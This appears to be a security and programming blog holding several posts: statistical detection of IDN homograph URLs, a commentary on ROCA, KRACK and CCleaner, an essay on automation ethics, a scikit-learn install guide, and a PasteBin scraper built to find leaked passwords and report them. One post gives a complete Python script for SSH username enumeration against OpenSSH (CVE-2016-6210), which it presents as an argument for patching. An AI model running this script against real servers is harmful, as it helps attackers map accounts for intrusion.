Programming, Security, Privacy, Technical

A Study in IDN Homograph Attack Detection

A Brief Introduction…

How well do you scrutinize the URLs that you click in a browser? Are you the wild type who click links before you read them? Or perhaps you are the cautious type — One of the careful number who hover over the link (without clicking), check the address that appears in the browser bar, and that it has a valid certificate (which might not mean so much as people think).

Let’s say that you are trying to get to ‘facebook.com’. You see a link and hover over it. The URL that appears in the browser bar says ‘facebook.com’. You click the link, but it takes you to a phishing site.

What happened? You checked the link. It said it was ‘facebook.com’!

You may have fallen victim to an IDN homograph attack. A homograph is a word that looks the same but has two meanings. In the example above, the user clicked a link that looked like ‘facebook.com’ but had a different meaning. How can that happen? The ‘how’ comes from the ‘IDN’ portion of the name: ‘internationalized domain name’. The URL in the address bar is actually pointing to a domain name. A domain name is the human-readable name of a website. The real address of a website (server) is an IP address, but people aren’t that great at remembering those so domain names make them memorable. For example, you can remember ‘facebook.com’ (the domain name) or you can remember ‘31.13.76.68’ (the ip address). The problem with domain names is that there are many languages. How do you support Mandarin characters in a domain name? Or Russian? You have to internationalize your ‘charset’ (The allowed characters, or individual letters). By internationalizing your charset, you now accept a far greater amount of characters than just simple English (latin-based) characters. This now lets people have domain names in their own language. But there is a down-side. In the charset, the same character may appear multiple times under different languages. For example, Cyrillic and Greek charsets (or alphabets) share similar characters (letters) to Latin. These characters will have separate identifiers, but will look very close, if not identical, to each other.

In the facebook example, the lower-case letter ‘o’ is identified by a character code ‘006F’ for the Latin alphabet (“Small letter o”), but could also be ’03BF’ in the Greek alphabet (small letter Omicron). If I were to register a domain name of facebook.com but with the Greek version of those letters, it may pass an internationalized domain name registration. I could then use this URL to trick people into clicking the link because it will visually look like the real thing. An even simpler example is the substitution of a capital ‘O’ with the number zero (0) in the domain name.

I wanted to see if I could detect these types of attacks and flag them using basic statistics.

The Idea…

My idea was quite simple. Each character in a charset can be broken down into their unique identifier (number) and alphabets (or charsets) are grouped together and thus their identifiers will be close together. The plan was to run basic statistical analysis (mean, median, max, min, and standard deviation) on the individual characters of a URL (or domain name). If there are characters that are outside the usual range, then throw a ‘red flag’. I also had to account for the fact that punctuation may throw off any analysis so there will have to be at least a few methods to identify anomalies — hence the calculation of mean, median, max, min, and standard deviations. I also avoided using neural networks for this particular problem although, as you will see in my summary/future works section, I can see merit in taking it that way.

I wanted a basic proof-of-concept system that would take a corpus of known valid URLs and derive a statistical model from them. Then I would use this model to compare new URLs and determine if they are within the same alphabet or if there was a possibility that they were homograph attacks.

The Project…

You can see/fork/download the project code here: https://github.com/calebshortt/homograph_detector

The project is quite simple and has two files in the main ‘base’ package. The ‘meat’ of the system is in the analysis.py file. The ‘results.py’ file was used to manage and compare results.

The flow is as such:

  1. Train the system using either a given string or a file with many strings
  2. Pass the system either a given string of a file with many strings to test
  3. Generate results and output them

The comparison function simply takes the statistics for the given test string and compares it (based on a defined number of standard deviations — default 2) to the model statistics — these are based on mean, median, and the standard deviations themselves (I actually created a metric that is the standard deviation of standard deviations). It also compares the max and min ranges of the character identifiers — this is a crude way to check the number ranges.

Here is the comparison function code:

def compare(self, str_stats, stdev_threshold=2):
        """
        :param str_stats: ResultSet object
        :param stdev_threshold: (int) number of standard deviations allowed
        :return:
        """

        print('Analysing: Threshold: 2 standard deviations...')

        str_max = str_stats.result_max
        str_min = str_stats.result_min
        str_mean = str_stats.mean_means
        str_median = str_stats.mean_medians
        str_stdev = str_stats.mean_stdevs

        if not (self.result_min <= str_min <= str_max <= self.result_max):
            return False, str_stats.all_stats, 'max/min range'

        r_mean_low = self.mean_means - stdev_threshold*self.stdev_means
        r_mean_high = self.mean_means + stdev_threshold*self.stdev_means
        if not (r_mean_low <= str_mean <= r_mean_high):
            return False, str_stats.all_stats, 'mean'

        r_median_low = self.mean_medians - stdev_threshold*self.stdev_medians
        r_median_high = self.mean_medians + stdev_threshold*self.stdev_medians
        if not (r_median_low <= str_median <= r_median_high):
            return False, str_stats.all_stats, 'median'

        r_std_low = self.mean_stdevs - stdev_threshold*self.stdev_stdevs
        r_std_high = self.mean_stdevs + stdev_threshold*self.stdev_stdevs
        if not (r_std_low <= str_stdev <= r_std_high):
            return False, str_stats.all_stats, 'stdev'

return True, str_stats.all_stats, None

NOTE: The above code compares the given string to the model ResultSet data in ‘self’.

Preliminary Results, Conclusion, and Future Work

The system was able to digest a Latin alphabet-based corpus (included in the source) and correctly identify URLs that had characters from other alphabets in them. The interesting thing about this method is that once the model is generated based on the corpus, it can be recorded and reused — no need to regenerate the model (which took the most time). The system was fast and quite accurate at first glance, although more analysis would be needed to make any real claims on its accuracy.

My file load function breaks on some charsets as they are not included in the default encoding for the python file-loading function (that or I missed something). I am working to fix this without clobbering the original encoding of the URL (which would defeat the purpose of this experiment).

This is already starting to look like a neural network would work nicely for this particular problem. I would like to feed the model stats into an ANN with perhaps some other inputs and see how it does. The basic stats I used were able to get decent results, but there are obvious edge cases that standard statistics wouldn’t identify (such as the old ‘substitute the 0 (zero) in for capital O’ trick). A neural network may help catch those.

I would say that it is quite possible to identify IDN homograph attacks using basic statistics and there are a few paths forward to improve accuracy with the results already demonstrated. With that said, nothing will compare to the standard ‘look before you click’ mentality. Users who identify the ‘0 instead of O’ substitution will not leave as much to chance. Systems like these aren’t catch-alls.

Standard
Programming, Security, Privacy, Technical

Growing Threats, Growing Attack Surface

It has been an interesting year of breaches, vulnerabilities, and scares. With the more recent ROCA vulnerability in Infineon’s TPM, a widely used module in the Smart Card industry, to the less-exploitable-but-still-serious KRACK vulnerability that makes hacking the WPA2 Wi-Fi security protocol possible, to the supply chain attack of CCleaner, a popular utility program for cleaning up a user’s computer.

What is clearly emerging from such events is that there is still much work to be done in the security space. The Ixia Security Report for 2017 describes an increase in the amount of malware and an increase in the size of company’s attack surface. Attack surface is the exposed, or public-facing, “surface area” of a company. Some have attributed the increase of attack surface to an increased usage and misconfiguration of cloud infrastructure. They argue that misconfiguration of servers looks to be replacing some of the more traditional OWASP top 10 vulnerabilities — such as SQL injection.

 

But the vulnerabilities listed above (ROCA, KRACK, and the CCleaner supply chain attack) aren’t necessarily cloud-related.

ROCA relates to an incorrectly-implemented software library — specifically the key pair generation. It allows an attacker to factor the private (secret) key just from using the public key. Modern encryption relies on a public key (that is sent to whoever wants it) and a secret (private) key that only the owner has and is used to decrypt messages. Only the private key can decrypt messages to the owner. This vulnerability allows anyone with the public key and some decent computational power (say an AWS cluster used to number-crunch) to get the original private key and decrypt the messages sent to the original owner. The computational power required is in the realm of “expensive but possible”. A targeted attack is a very real possibility, but widespread breaching would be infeasible.

KRACK involves a replay attack. “By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic”. This vulnerability requires a physical component as the attacker will have to be on the Wi-Fi network. The cause is inherent to the standard — which means all correctly-implemented versions of the standard are vulnerable (i.e. Libraries that implemented it to spec). Many security practitioners have taken this particular moment in time to explain that the usage of a Virtual Private Network (VPN) would mitigate such attacks, and that Wi-Fi should be an un-trusted source to begin with.

The CCleaner supply chain attack included an injection of malware in a library that is used in the implementation of CCleaner. When the CCleaner program is packaged and deployed it will include this third-party library in its package. This type of attack takes advantage of consumer’s trust in CCleaner, and it is becoming a more popular attack for hackers. For the record, CCleaner has been sanitized and is no longer a threat from this malware. I imagine Avast, the company that offers CCleaner, also took a look at their supply chain trust and revamped some policies around it.

 

Each of these attacks are in addition to the general increase of attack surface and the misconfiguration of servers (that are becoming more common). There is an increase of supply chain attacks because they clearly work. There are plenty of incorrect implementations of standards or protocols that hackers can take advantage of. There are, far less often, errors in the actual standard or protocol themselves.

It may seem like the odds are piled against an organization’s security team. They are. That is why security is not only the responsibility of the security team, but the entire organization from the executive branch to the developers (who choose to implement specific libraries in their software) to the tech support teams that are often on the “front-line” with customers.

Education is always a good first step.

Standard
General, Programming

Software Development, Morality, ‘The Secret Life of Walter Mitty’, and Victor Frankenstein

For those who haven’t watched ‘The Secret Life of Walter Mitty’, I highly recommend a showing. It follows Walter Mitty, a daydreaming “negative asset manager” at LIFE magazine during its conversion to a fully-online offering. It truly is a visually stunning work.

The opening premise, LIFE magazine moving online and the inevitable downsizing and layoffs, struck a chord that has been, and is still, resonating: Is there a place for morality in software developer’s drive toward automation and efficiency?

One would be quite right in saying that the issue of ‘worker layoffs due to automation’ is not a new problem. History is full of examples. What piques my interest, however, is the generality of software automation. The immense reach of software naturally leads to an immense number of avenues for automation.

For example: I found myself talking with a colleague about the problems that they were having with some of their staff. When we finally distilled the problem down to its essence, we discovered that a great portion of his department was dedicated to the handling and sorting of files (originally electronic, then printed, then sorted and filed). I found myself flippantly stating that I could replace most of his department with a script.

My watching of ‘Walter Mitty’ sparked a wave of introspection, and a single question welled within me: If I could write a script that replaces an entire department, should I?

The script would increase the company’s efficiency through a significant reduction in cost. But why is efficiency so important that one would look for avenues to terminate the employment of others? Who benefits from it? Recently, it seems, the cost savings would not make its to the remaining employees but would manifest as bonuses for an executive, or manager, or perhaps dividends for shareholders.

Is inefficiency really that bad? In this case a department is being employed to do work. They are doing the work satisfactorily. Their wages pay for local food, rent, and expenses. This provides a boon to the local economy. If the populace is scraping by financially they surly will not be purchasing cars, houses, or other ‘big ticket items’. Would this not stagnate the greater economy?

Would a 100%-efficient company have anyone working there?

My authorship of this script directly instigates the termination of those employees. The causative relationship is undeniable.

Such scenarios are drenched with hubris as such mechanisms are en-route to also replace developers. In this we are the architects of our own obsolescence and ultimate demise: Dr. Frankenstein would surely have words with us. It is pure arrogance to assume such devices would not also be applied towards our craft.

Some may argue that apparatuses are in place to mitigate such effects, or that the evolution of the market warrants the employee’s termination: ‘They have become obsolete and must retool to stay competitive’, or ‘that is what welfare is for’, or ‘universal basic income is the future for this very reason’. Such comments do not address my question, ‘If one could write a script to replace a large group of people’s jobs, should they?’, rather they address the symptom, or after-effects, of such a decision — The employees are terminated, now what?

Perhaps this is the issue?

At the risk of sounding defensive I must note that I am not one to resist change. Resistance to change in our particular field is a doomed prospect to say the least. But one must address the social and economic implications of their decisions. One must have a conscience.

I do not have an answer. The creation of software is a technical achievement, a work of art, a labor of love, and wildly creative. It behooves those who embark on such journeys to consider their implications. Perhaps it is our hubristic tendencies as developers, or our arrogance, that drives us to construct our own monsters. Dr. Frankenstein would surely have words with us.

 

Standard
Programming, Security, Privacy, Technical

A Look At Using Discovered Exploits

There are usually two general steps for a software exploit to be created.

The first step is the vulnerability discovery. This is the hardest of the two steps. It requires in-depth knowledge about the target software, device, or protocol and a creative mind that is tuned to edge cases and exceptions.

The second step is the exploitation of the discovered vulnerability. This requires the developer to take the vulnerability description and write a module or script that takes advantage of it.

This article will address the second step: Exploit creation.

First, where do we find vulnerabilities for software if we do not discover them ourselves? There are online databases that store published vulnerabilities (and may include example code) in a searchable format. A few are CVE, exploit-db, or the NVD.

Looking through these databases we will see that all published vulnerabilities have a unique CVE identifier. They uniquely identify each vulnerability that has been discovered and confirmed. Using the databases we can search for potential vulnerabilities of a particular target (Note: This is similar to what a bot might try, after it has scanned a new target server, to find any published vulnerabilities).

Some vulnerability descriptions may even sample code — such as CVE-2016-6210. This makes it trivial to write a script that may utilize this vulnerability. For example, we could use the code given to us in CVE-2016-6210 and expand it to make a command-line script that takes a list of known usernames and tries each one… Which is the vulnerability the CVE describes: “SSH Username Enumeration Vulnerability”.

This script will not breach the system, but what it will do is try to find valid usernames via SSH. This vulnerability may lead to, or become part of, a larger attack. It is important to patch all discovered vulnerabilities as you don’t know how an adversary will try to attack your system.

Given the sample code, here is our improved version:


import paramiko
import time
import argparse
import logging

logging.basicConfig()

class Engine(object):
    file_path = None
    target = ''
    userlist = ['root']
    calc_times = []

    req_time = 0.0
    num_pools = 10

    def __init__(self, target, filepath=None, req_time=0.0):
        self.req_time = req_time
        self.target = target
        self.file_path = filepath
        if self.file_path:
            self.load_users(filepath)

    def load_users(self, filepath):
        data = []
        with open(filepath, 'r') as f:
        data = f.read().splitlines()
        self.userlist = data

    def partition_list(self, p_list):
        p_size = len(p_list) / self.num_pools
        for i in xrange(0, len(p_list), p_size):
            yield p_list[i:i+p_size]

    def execute(self):
        for user in self.userlist:
            self.test_with_user(user)

    def test_with_user(self, user):
        p = 'A' * 25000
        ssh = paramiko.SSHClient()
        start_time = time.clock()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        end_time = time.clock()
        try:
            ssh.connect(self.target, username=user, password=p)
        except:
            end_time = time.clock()
        total = end_time - start_time
        self.calc_times.append(total)
        avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times)
        flag = '*' if total &amp;amp;gt; avg else ''
        print('%s:\t\t%s\t%s' % (user, total, flag))
        time.sleep(self.req_time)
        ssh.close()

def main(ip_addr, filename=None, req_time=0.0):
    if ip_addr == '' or not ip_addr:
        print('No target IP specified')
        return
    if filename == '':
        filepname = None
    engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)
    engine.execute()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 &amp;amp;gt;= version')
    parser.add_argument('ip', help='[Required] The IP of the target server')
    parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')
    parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')
    ip_addr = None
    filename = None
    req_time = 0.0
    args = parser.parse_args()

    if args.ip:
        ip_addr = args.ip
    if args.userlist:
        filename = args.userlist
    if args.time:
        req_time = float(args.time)
    main(ip_addr, filename, req_time)

 

It is much easier to write exploits for already-discovered vulnerabilities than it is to discover them yourself.

This is why it is vital that system admins keep their servers and software up to date.

 

 

 

Standard
Programming, Technical, Uncategorized

Installing scikit-learn; Python Data Mining Library

Update: The instructions of this post are for Python 2.7. If you are using Python 3, the process is simplified. The instructions are here:

Starting with a Python 3.6 environment.

Assumptions (What I expect to already be installed):

  1. Install numpy: pip install numpy
  2. Install scipy: pip install scipy
  3. Install sklearn: pip install sklearn

Test installation by opening a python interpreter and importing sklearn:
python
import sklearn

If it successfully imports (no errors), then sklearn is installed correctly.

Introduction

Scikit-learn is a great data mining library for Python. It provides a powerful array of tools to classify, cluster, reduce, select, and so much more. I first encountered scikit-learn when I was developing prototypes for my first business venture. I wanted to use something that was easy and powerful. Scikit-learn was just that tool.

The only problem with scikit-learn is that it builds off of some powerful-yet-finicky libraries, and you will need to install those libraries, NumPy and SciPy, before you can proceed with installing scikit-learn.

To a novice, this can be a frustrating task since the order of installation matters and many Google searches will only produce unhelpful and long-winded responses. Thus, my motivation to set the record straight and provide a quick tutorial on how to install scikit-learn — mostly on Windows, but I have provided links and notes on both Linux and Mac installations as well.

In the process of this tutorial, you will install (or already have) the following — in this order:

NOTE: I have provided the links unlabeled above because, like all tech/installation tutorials, over time they become obsolete. By providing the links as they are, it is my hope that even if new versions come out, you will be able to use this tutorial to find the resources you need.

Step 1: Install Python

If you do not already have Python, install it now at the address provied above (https://www.python.org/downloads/). I will be using Python 2.7 for this tutorial.

The installer for python is quick and good. Once installed, we will need to check to see if Python is available on the command line. Open a terminal by searching for ‘cmd’ or running C:\Windows\System32\cmd.exe. I would recommend creating a shortcut if you are doing this a lot.

in the command line, enter:

python –version

something similar to “Python 2.7.6” should display. That shows that python is working and accessible from the cmd line.

Step 2: Install NumPy

NumPy is a powerful library for Python that contains advanced numerical capabilities.

Install NumPy by downloading the correct installer using the link provided above (http://sourceforge.net/projects/numpy/files/NumPy/1.10.2/) then run the installer.

NOTE: There are a few installers based on your OS version AND the version of Python you have. It is important that you find the right installer for your OS and Python version!

Step 3: Install SciPy

Download the SciPy installer using the link provided above (http://sourceforge.net/projects/scipy/files/scipy/0.16.1/) and run it.

NOTE: There are a few installers based on your OS version AND the version of Python you have. It is important that you find the right installer for your OS and Python version!

Step 4: Install Pip

Pip is a package manager specifically for Python. It comes in handy so much that I highly recommend that you install it to help manage python packages.

Go to the link provided above (https://pip.pypa.io/en/stable/installing/).

The easiest way to install pip on Windows is by using the ‘get_pip.py’ script and then running it in your command line:

python get_pip.py

If you are on Linux you can use apt-get (or whatever package manager you have):

sudo apt-get install python-pip

Step 5: Install scikit-learn

NOTE: More information on installing scikit-learn at the link provided above (http://scikit-learn.org/stable/install.html)

On Windows: use pip to install scikit-learn:

pip install scikit-learn

On Linux: Use the package manager or follow the build instructions at http://www.bogotobogo.com/python/scikit-learn/scikit-learn_install.php

Step 6: Test Installation

Now we must see if everything installed correctly. Open up a command line terminal and type:

python

This will open a python interpreter. You will know this because there will be some text and three chevrons, “>>>”, prompting input. Type:

import sklearn

If nothing happens and another prompt appears scikit-learn has been installed correctly.

If an error occurs, there might have been a mis-step in the process. Go back through the tutorial to see if any steps were missed or follow the error message that was given.

Standard
Programming, Technical

An Experiment on PasteBin

A while ago I was browsing the public pastes on PasteBin and I came across a few e-mail/password dumps from either malware or some hacker trying to make a name for himself.

As I perused the information, I was shocked to find usernames, emails, passwords, social security numbers, credit card numbers, and more in these dumps. I reported the posts as credit card info and SSNs are nothing to trifle with, but the thought lingered as to why they were public in the first place. There must be a way to automate the process of reporting these posts, I thought, usernames and especially passwords hold a very unique signature: at least one upper-case letter, at least one lower-case letter, at least one digit, and at least 8 characters long.

How many words in the english language have that particular combination?

This question inevitably led to an experiment.

The parameters were quite simple: How accurate can I identify a password that is surrounded by junk text in a post?
This is actually harder than is seems as we can’t simply assume that the posts will be in English, or that they will be a human language at all (code). This presented an interesting problem to work with and I started development of a framework to solve it.

The solution

The system to test my question is quite simple. It includes a web page scraper and an analysis engine.

The scraper is simple enough and goes to pastebin’s public post archive and pulls all of the links to “pastes” contained therein. It then grabs only the paste text from each page and adds them to a list. This list is sent to the analysis engine.

The analysis engine uses a spam filter-like merit score to help identify interesting pastes and discard pastes that do not have anything interesting in them.

It uses a series of filters to affect the merit score:

The first one is a simple password identification. It uses a master list of popular passwords and searches each paste for them. If a keyword is found, the post’s merit score is increased.

The second filter is keyword identification. This is similar to the password identification but it includes words and phrases that are not passwords but might signal a paste that is more likely to have passwords in it. These keywords are held in a dictionary that also stores the associated merit value (positive or negative).

The third filters are the basic password rules:

  • Must have at least one capital letter
  • Must have at least one lower-case letter
  • Must have at least one digit
  • Must be at least 8 characters long

The analysis engine then returns a list of all of the links sorted by “most-likely to have a password” — Highest probability at the top.

Results and Conclusion

I initially found that the basic filters I had created were getting less fast positives than the basic password filter (#3) but still wouldn’t get promising results. The accuracy of the identification would have to be improved before I attempted any sort of automation for reporting. So I have open-sourced the software and made it available on pip (as it is written in python):

The project is called “Pastebin Password Scraper” or PBPWScraper:

Here is the PBPWScraper Github

You can use pip to install the latest release version of the library by entering:

pip install PBPWScraper

It was an interesting experiment and it is fun to tweak the filters to improve certain aspects of the analysis. I will continue to work on the system and see if I am able to decrease its false-positive count enough to warrant an automated reporting module.

Standard